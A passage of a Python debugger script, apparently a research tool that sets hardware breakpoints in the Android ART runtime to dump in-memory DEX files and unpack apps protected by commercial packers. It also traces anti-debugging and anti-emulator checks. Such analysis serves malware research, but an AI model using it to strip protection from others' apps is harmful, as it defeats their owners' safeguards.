brk_ArtQuickToInterpreterBridge_cmd = "hbreak" + " " + str(hex(config.brk_ArtQuickToInterpreterBridge)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_ArtQuickToInterpreterBridge_cmd)
# brk_ArtInterpreterToInterpreterBridge_cmd = "hbreak" + " " + str(hex(config.brk_ArtInterpreterToInterpreterBridge)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_ArtInterpreterToInterpreterBridge_cmd)
# brk_ArtInterpreterToCompiledCodeBridge_cmd = "hbreak" + " " + str(hex(config.brk_ArtInterpreterToCompiledCodeBridge)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_ArtInterpreterToCompiledCodeBridge_cmd)
brk_DoCall_cmd = "hbreak" + " " + str(hex(config.brk_DoCall)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_DoCall_cmd)
# brk_ArtQuickGenericJniTrampoline_cmd = "hbreak" + " " + str(hex(config.brk_ArtQuickGenericJniTrampoline)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_ArtQuickGenericJniTrampoline_cmd)
brk_InvokeWithArgArray_cmd = "hbreak" + " " + str(hex(config.brk_InvokeWithArgArray)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_InvokeWithArgArray_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtQuickToInterpreterBridge:
bs_ArtQuickToInterpreterBridge_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtQuickToInterpreterBridge_script)
execution_state.executeDSCommand(bs_ArtQuickToInterpreterBridge_cmd)
brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtInterpreterToInterpreterBridge:
# bs_ArtInterpreterToInterpreterBridge_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtInterpreterToInterpreterBridge_script)
# execution_state.executeDSCommand(bs_ArtInterpreterToInterpreterBridge_cmd)
# brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtInterpreterToCompiledCodeBridge:
# bs_ArtInterpreterToCompiledCodeBridge_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtInterpreterToCompiledCodeBridge_script)
# execution_state.executeDSCommand(bs_ArtInterpreterToCompiledCodeBridge_cmd)
# brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_DoCall:
bs_DoCall_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.DoCall_script)
execution_state.executeDSCommand(bs_DoCall_cmd)
brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtQuickGenericJniTrampoline:
# bs_ArtQuickGenericJniTrampoline_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtQuickGenericJniTrampoline_script)
# execution_state.executeDSCommand(bs_ArtQuickGenericJniTrampoline_cmd)
# brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_InvokeWithArgArray:
bs_InvokeWithArgArray_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.InvokeWithArgArray_script)
execution_state.executeDSCommand(bs_InvokeWithArgArray_cmd)
brk_object.enable()
# define the analyzing configuration related to the Native execution flow
def ne_setup(pid):
# define the breakpoints
# - JNI_onLoad - #
# brk_LoadNativeLibrary_cmd = "hbreak" + " " + str(hex(config.brk_LoadNativeLibrary)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_LoadNativeLibrary_cmd)
# brk_JNI_onLoad_cmd = "hbreak" + " " + str(hex(config.brk_JNI_onLoad)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_JNI_onLoad_cmd)
# - JNI method - #
brk_ArtQuickGenericJniTrampoline_cmd = "hbreak" + " " + str(hex(config.brk_ArtQuickGenericJniTrampoline)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_ArtQuickGenericJniTrampoline_cmd)
brk_GenericJniMethodEnd_cmd = "hbreak" + " " + str(hex(config.brk_GenericJniMethodEnd)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_GenericJniMethodEnd_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
# - JNI_onLoad - #
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadNativeLibrary:
# bs_LoadNativeLibrary_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.LoadNativeLibrary_script)
# execution_state.executeDSCommand(bs_LoadNativeLibrary_cmd)
# brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_JNI_onLoad:
# bs_JNI_onLoad_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.JNI_onLoad_script)
# execution_state.executeDSCommand(bs_JNI_onLoad_cmd)
# brk_object.enable()
# - JNI method - #
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_ArtQuickGenericJniTrampoline:
bs_ArtQuickGenericJniTrampoline_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ArtQuickGenericJniTrampoline_script)
execution_state.executeDSCommand(bs_ArtQuickGenericJniTrampoline_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_GenericJniMethodEnd:
bs_GenericJniMethodEnd_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.GenericJniMethodEnd_script)
execution_state.executeDSCommand(bs_GenericJniMethodEnd_cmd)
brk_object.enable()
# define the analyzing configuration related to the linker
def linker_setup(pid):
# define the breakpoints
# brk_do_dlopen_cmd = "hbreak" + " " + str(hex(config.brk_do_dlopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_do_dlopen_cmd)
# brk_JNI_onLoad_cmd = "hbreak" + " " + str(hex(config.brk_JNI_onLoad)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_JNI_onLoad_cmd)
brk_RegisterNatives_cmd = "hbreak" + " " + str(hex(config.brk_RegisterNatives)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_RegisterNatives_cmd)
# brk_clear_cache_cmd = "hbreak" + " " + "EL1N:0xFFFFFF800809541C" + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_clear_cache_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_do_dlopen:
# bs_do_dlopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.do_dlopen_script)
# execution_state.executeDSCommand(bs_do_dlopen_cmd)
# brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_JNI_onLoad:
# bs_JNI_onLoad_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.JNI_onLoad_script)
# execution_state.executeDSCommand(bs_JNI_onLoad_cmd)
# brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_RegisterNatives:
bs_RegisterNatives_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.RegisterNatives_script)
execution_state.executeDSCommand(bs_RegisterNatives_cmd)
brk_object.enable()
# if (long(brk_object.getAddresses()[0]) & 0xffffffffffffffffL) == 0xFFFFFF800809541CL:
# bs_clear_cache_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.clear_cache_script)
# execution_state.executeDSCommand(bs_cacheflush_cmd)
# brk_object.enable()
# ---- #
# ADG
def anti_debugging(pid):
# define the breakpoints
brk_do_dlopen_cmd = "hbreak" + " " + str(hex(config.brk_do_dlopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_do_dlopen_cmd)
brk_fopen_cmd = "hbreak" + " " + str(hex(config.brk_fopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_fopen_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_do_dlopen:
bs_do_dlopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.do_dlopen_script)
execution_state.executeDSCommand(bs_do_dlopen_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_fopen:
bs_fopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.fopen_adg_script)
execution_state.executeDSCommand(bs_fopen_cmd)
brk_object.enable()
# AEU
def anti_emulator(pid):
# define the breakpoints
brk_do_dlopen_cmd = "hbreak" + " " + str(hex(config.brk_do_dlopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_do_dlopen_cmd)
brk_fopen_cmd = "hbreak" + " " + str(hex(config.brk_fopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_fopen_cmd)
brk_system_property_get = "hbreak" + " " + str(hex(config.brk_system_property_get)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_system_property_get)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_do_dlopen:
bs_do_dlopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.do_dlopen_script)
execution_state.executeDSCommand(bs_do_dlopen_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_fopen:
bs_fopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.fopen_aeu_script)
execution_state.executeDSCommand(bs_fopen_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_system_property_get:
bs_system_property_get_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.system_property_get_script)
execution_state.executeDSCommand(bs_system_property_get_cmd)
brk_object.enable()
# ADI
def anti_instrumentation(pid):
# define the breakpoints
brk_do_dlopen_cmd = "hbreak" + " " + str(hex(config.brk_do_dlopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_do_dlopen_cmd)
brk_fopen_cmd = "hbreak" + " " + str(hex(config.brk_fopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_fopen_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_do_dlopen:
bs_do_dlopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.do_dlopen_script)
execution_state.executeDSCommand(bs_do_dlopen_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_fopen:
bs_fopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.fopen_adi_script)
execution_state.executeDSCommand(bs_fopen_cmd)
brk_object.enable()
# TCK (gettimeofday for ijiami, time for qihoo)
def time_checking_setup(pid):
# define the breakpoints
brk_gettimeofday_cmd = "hbreak" + " " + str(hex(config.brk_gettimeofday)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_gettimeofday_cmd)
# brk_time_cmd = "hbreak" + " " + str(hex(config.brk_time)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_time_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_gettimeofday:
bs_gettimeofday_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.gettimeofday_script)
execution_state.executeDSCommand(bs_gettimeofday_cmd)
brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_time:
# bs_time_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.time_script)
# execution_state.executeDSCommand(bs_time_cmd)
# brk_object.enable()
# SLH
def system_library_hooking_setup(pid):
# define the breakpoints
brk_do_dlopen_cmd = "hbreak" + " " + str(hex(config.brk_do_dlopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_do_dlopen_cmd)
brk_clear_cache_cmd = "hbreak" + " " + "EL1N:0xFFFFFF800809541C" + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_clear_cache_cmd)
# brk_mmap_cmd = "hbreak" + " " + str(hex(config.brk_mmap)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_mmap_cmd)
# brk_munmap_cmd = "hbreak" + " " + str(hex(config.brk_munmap)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
# execution_state.executeDSCommand(brk_munmap_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_do_dlopen:
bs_do_dlopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.do_dlopen_script)
execution_state.executeDSCommand(bs_do_dlopen_cmd)
brk_object.enable()
if (long(brk_object.getAddresses()[0]) & 0xffffffffffffffffL) == 0xFFFFFF800809541CL:
bs_clear_cache_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.clear_cache_script)
execution_state.executeDSCommand(bs_clear_cache_cmd)
brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_mmap:
# bs_mmap_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.mmap_script)
# execution_state.executeDSCommand(bs_mmap_cmd)
# brk_object.enable()
# if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_munmap:
# bs_munmap_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.munmap_script)
# execution_state.executeDSCommand(bs_munmap_cmd)
# brk_object.enable()
# ---- #
def art_object_modification_setup(pid):
# define the breakpoints
brk_do_dlopen_cmd = "hbreak" + " " + str(hex(config.brk_do_dlopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_do_dlopen_cmd)
brk_LoadClassMembers_cmd = "hbreak" + " " + str(hex(config.brk_LoadClassMembers)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_LoadClassMembers_cmd)
brk_LoadMethod_cmd = "hbreak" + " " + str(hex(config.brk_LoadMethod)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_LoadMethod_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_do_dlopen:
bs_do_dlopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.do_dlopen_script)
execution_state.executeDSCommand(bs_do_dlopen_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadClassMembers:
bs_LoadClassMembers_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.LoadClassMembers_script)
execution_state.executeDSCommand(bs_LoadClassMembers_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadMethod:
bs_LoadMethod_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.LoadMethod_script)
execution_state.executeDSCommand(bs_LoadMethod_cmd)
brk_object.enable()
def force_art_object_modification_setup(pid):
# define the breakpoints
brk_do_dlopen_cmd = "hbreak" + " " + str(hex(config.brk_do_dlopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_do_dlopen_cmd)
brk_FindClass_cmd = "hbreak" + " " + str(hex(config.brk_FindClass)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_FindClass_cmd)
brk_LoadMethod_cmd = "hbreak" + " " + str(hex(config.brk_LoadMethod)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_LoadMethod_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_do_dlopen:
bs_do_dlopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.do_dlopen_script)
execution_state.executeDSCommand(bs_do_dlopen_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_FindClass:
bs_FindClass_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.FindClass_ijiami_script)
execution_state.executeDSCommand(bs_FindClass_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadMethod:
bs_LoadMethod_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.LoadMethod_script)
execution_state.executeDSCommand(bs_LoadMethod_cmd)
brk_object.enable()
def class_modification_setup(pid):
# define the breakpoints
brk_ClassModification_cmd = "hbreak" + " " + str(hex(config.brk_DoCall)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_ClassModification_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_DoCall:
bs_ClassModification_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.ClassModification_script)
execution_state.executeDSCommand(bs_ClassModification_cmd)
brk_object.enable()
def force_class_modification_setup(pid):
# define the breakpoints
brk_FindClass_cmd = "hbreak" + " " + str(hex(config.brk_FindClass)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_FindClass_cmd)
brk_InitClass_cmd = "hbreak" + " " + str(hex(config.brk_InitClass)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_InitClass_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_FindClass:
bs_FindClass_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.FindClass_kiwi_script)
execution_state.executeDSCommand(bs_FindClass_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_InitClass:
bs_InitClass_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.InitClass_kiwi_script)
execution_state.executeDSCommand(bs_InitClass_cmd)
brk_object.disable()
# ---- #
def unpack_baidu_2018(pid):
pass
def unpack_bangcle_2018(pid):
pass
def unpack_ijiami_2018(pid):
time_checking_setup(pid)
force_art_object_modification_setup(pid)
pass
def unpack_kiwi_2018(pid):
force_class_modification_setup(pid)
pass
def unpack_qihoo_2018(pid):
pass
def unpack_tencent_2018(pid):
pass
# ---- #
# performance
def cf_bench(pid):
# define the breakpoints
# brk_LoadNativeLibrary_cmd = "hbreak" + " " + str(hex(config.brk_LoadNativeLibrary)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
brk_LoadNativeLibrary_cmd = "hbreak" + " " + str(hex(config.brk_LoadNativeLibrary)).replace('L', '')
execution_state.executeDSCommand(brk_LoadNativeLibrary_cmd)
# brk_do_dlopen_cmd = "hbreak" + " " + str(hex(config.brk_do_dlopen)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
brk_do_dlopen_cmd = "hbreak" + " " + str(hex(config.brk_do_dlopen)).replace('L', '')
execution_state.executeDSCommand(brk_do_dlopen_cmd)
brk_clock_gettime_cmd = "hbreak" + " " + str(hex(config.brk_clock_gettime)).replace('L', '') + " " + "context" + " " + str(hex(pid)).replace('L', '')
execution_state.executeDSCommand(brk_clock_gettime_cmd)
# define the breakpoint scripts
for idx in range(0, execution_state.getBreakpointService().getBreakpointCount()):
brk_object = execution_state.getBreakpointService().getBreakpoint(idx)
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_LoadNativeLibrary:
bs_LoadNativeLibrary_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.LoadNativeLibrary_script)
execution_state.executeDSCommand(bs_LoadNativeLibrary_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_do_dlopen:
bs_do_dlopen_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.do_dlopen_script)
execution_state.executeDSCommand(bs_do_dlopen_cmd)
brk_object.enable()
if (int(brk_object.getAddresses()[0]) & 0xffffffff) == config.brk_clock_gettime:
bs_clock_gettime_cmd = "break-script" + " " + str(brk_object.getId()) + " " + os.path.join(config.workspace, config.script_directory, config.clock_gettime_script)
execution_state.executeDSCommand(bs_clock_gettime_cmd)
brk_object.enable()
brk_object.disable()
# ---- #
# set the analyzing environment
def setup(pid):
assert execution_state.getBreakpointService().getBreakpointCount() == 1
# remove all current breakpoints
try:
debugger.removeAllBreakpoints()
except DebugException:
rm_brks = []
for breakpoint_index in range(0, execution_state.getBreakpointService().getBreakpointCount()):
breakpoint_object = execution_state.getBreakpointService().getBreakpoint(breakpoint_index)
if breakpoint_object.isHardware() or ((int(breakpoint_object.getAddresses()[0]) & 0xffffffff) == config.brk_DexFile):
rm_brks.append(breakpoint_object)
for brk_obj in rm_brks:
brk_obj.remove()
# -- Common BRK -- #
dex_setup(pid)
# je_setup(pid) # ??
# ne_setup(pid) # ??
# linker_setup(pid) # ??
# -- Behavior BRK -- #
# anti_debugging(pid)
# anti_emulator(pid)
# anti_instrumentation(pid)
# time_checking_setup(pid)
# system_library_hooking_setup(pid)
# art_object_modification_setup(pid)
# class_modification_setup(pid)
# -- Unpack BRK -- #
# unpack_baidu_2018(pid)
# unpack_bangcle_2018(pid)
# unpack_ijiami_2018(pid)
# unpack_kiwi_2018(pid)
# unpack_qihoo_2018(pid)
# unpack_tencent_2018(pid)
# -- Evaluation BRK -- #
# cf_bench(pid)
def retrieve_string_value(string_ptr):
length_val = memory.readMemory32(string_ptr + config.offset_string_length)
reference_ptr = memory.readMemory32(string_ptr + config.offset_string_reference)
char_array = memory.retrieve_char_array(reference_ptr)
return char_array
def cleanup():
if mmu.page_table is not None:
del mmu.page_table
gc.collect()
find_library_offset = 0x0000592e
call_constructors_offset = 0x00005970
def init_art():
# get the PID
pid_val = int(execution_state.getVariableService().readValue("$AARCH64::$System::$Memory::$CONTEXTIDR_EL1.PROCID")) & 0xffffffff
# -1-
# read the "name" parameter
name_ptr = int(execution_state.getRegisterService().getValue("R0")) & 0xffffffff
name_val = memory.retrieve_char_array(name_ptr)
# read the "flags" parameter
flags_val = int(execution_state.getRegisterService().getValue("R1")) & 0xffffffff
# read the "extinfo" parameter
extinfo_ptr = int(execution_state.getRegisterService().getValue("R2")) & 0xffffffff
if config.debug:
print "[entrypoint] [do_dlopen] pid = %#x" % pid_val
print "[entrypoint] [do_dlopen] name = %s" % name_val
print "[entrypoint] [do_dlopen] flags_val = %#x" % flags_val
print "[entrypoint] [do_dlopen] extinfo_ptr = %0#10x" % extinfo_ptr
# the first loaded Oat file must be our target
if not config.package_filter(name_val):
# should not be reached
assert False
config.log_print("[entrypoint] [do_dlopen] pid = %#x" % pid_val)
# -2-
# goto the invocation of the find_library method
brk_find_library_offset = config.linker_base + find_library_offset - config.linker_file_offset + config.linker_memory_offset
execution_state.getExecutionService().resumeTo(brk_find_library_offset)
try:
execution_state.getExecutionService().waitForStop(120000) # wait for 120s
except DebugException:
raise RuntimeError("wtf !!!")
# retrieve soinfo pointer
si_ptr = int(execution_state.getRegisterService().getValue("R0")) & 0xffffffff
if config.debug:
print "[entrypoint] [do_dlopen] si = %0#10x" % si_ptr
base_ptr = si_ptr + config.offset_soinfo_base
base_val = memory.readMemory32(base_ptr)
size_ptr = si_ptr + config.offset_soinfo_size
size_val = memory.readMemory32(size_ptr)
if base_val == 0x0 or size_val == 0x0:
# -3-
# goto the invocation of the call_constructors method
brk_call_constructors_offset = config.linker_base + call_constructors_offset - config.linker_file_offset + config.linker_memory_offset
execution_state.getExecutionService().resumeTo(brk_call_constructors_offset)
try:
execution_state.getExecutionService().waitForStop(120000) # wait for 120s
except DebugException:
raise RuntimeError("wtf !!!")
base_ptr = si_ptr + config.offset_soinfo_base
base_val = memory.readMemory32(base_ptr)
size_ptr = si_ptr + config.offset_soinfo_size
size_val = memory.readMemory32(size_ptr)
if config.debug:
print "[entrypoint] [do_dlopen] si->base = %0#10x" % base_val
print "[entrypoint] [do_dlopen] si->size = %#x" % size_val
config.log_print("[entrypoint] [do_dlopen] name = %s, si->base = %0#10x, si->size = %#x" % (name_val, base_val, size_val))
if not base_val == 0x0:
config.save_range_info(base_val, base_val + size_val - 0x1)
# initialization
setup(pid_val)
# continue the execution of the target application
execution_state.getExecutionService().resume()
cleanup()
return
def init_dvm():
# get the PID
pid_val = int(execution_state.getVariableService().readValue("$AARCH64::$System::$Memory::$CONTEXTIDR_EL1.PROCID")) & 0xffffffff
# get the pointer that refers to the DexFile structure
dex_file_ptr = int(execution_state.getRegisterService().getValue("R0")) & 0xffffffff
# read the "begin_" field
dex_file_begin_val = int(execution_state.getRegisterService().getValue("R1")) & 0xffffffff
# read the "size_" field
dex_file_size_val = int(execution_state.getRegisterService().getValue("R2")) & 0xffffffff
# read the "location_" field
dex_file_location_ptr = int(execution_state.getRegisterService().getValue("R3")) & 0xffffffff
# retrieve the value of the std::string structure
dex_file_location_string_val = retrieve_string_value(dex_file_location_ptr)
if config.debug:
print "[entrypoint] [DexFile] pid = %#x" % pid_val
print "[entrypoint] [DexFile] begin_ = %0#10x" % dex_file_begin_val
print "[entrypoint] [DexFile] size_ = %#x" % dex_file_size_val
print "[entrypoint] [DexFile] location_ = %s" % dex_file_location_string_val
# the first loaded Dex file must be our target
if not config.package_filter(dex_file_location_string_val):
# should not be reached
assert False
config.log_print("[DexFile] pid = %#x" % pid_val)
config.log_print("[DexFile] begin_ = %0#10x, size_ = %#x, location_ = %s" % (dex_file_begin_val, dex_file_size_val, dex_file_location_string_val))
# initialization
setup(pid_val)
# dump the in-memory DexFile
file_path = os.path.join(config.workspace, config.dex_directory, dex_file_location_string_val.split("/")[-1])
file_format = "binary"
file_vtl_start_address = dex_file_begin_val
file_vtl_end_address = dex_file_begin_val + dex_file_size_val - 0x1
memory.dump(file_path, file_format, file_vtl_start_address, file_vtl_end_address)
# continue the execution of the target application
execution_state.getExecutionService().resume()
cleanup()
return
# ---- #
if __name__ == '__main__':
if config.art:
init_art()
if config.dvm:
init_dvm()
sys.exit()
| 53.399116
| 210
| 0.719014
| 4,340
| 36,258
| 5.718894
| 0.063594
| 0.053666
| 0.106366
| 0.029009
| 0.825786
| 0.771636
| 0.738114
| 0.725947
| 0.706487
| 0.703666
| 0
| 0.010366
| 0.135253
| 36,258
| 678
| 211
| 53.477876
| 0.78124
| 0.272243
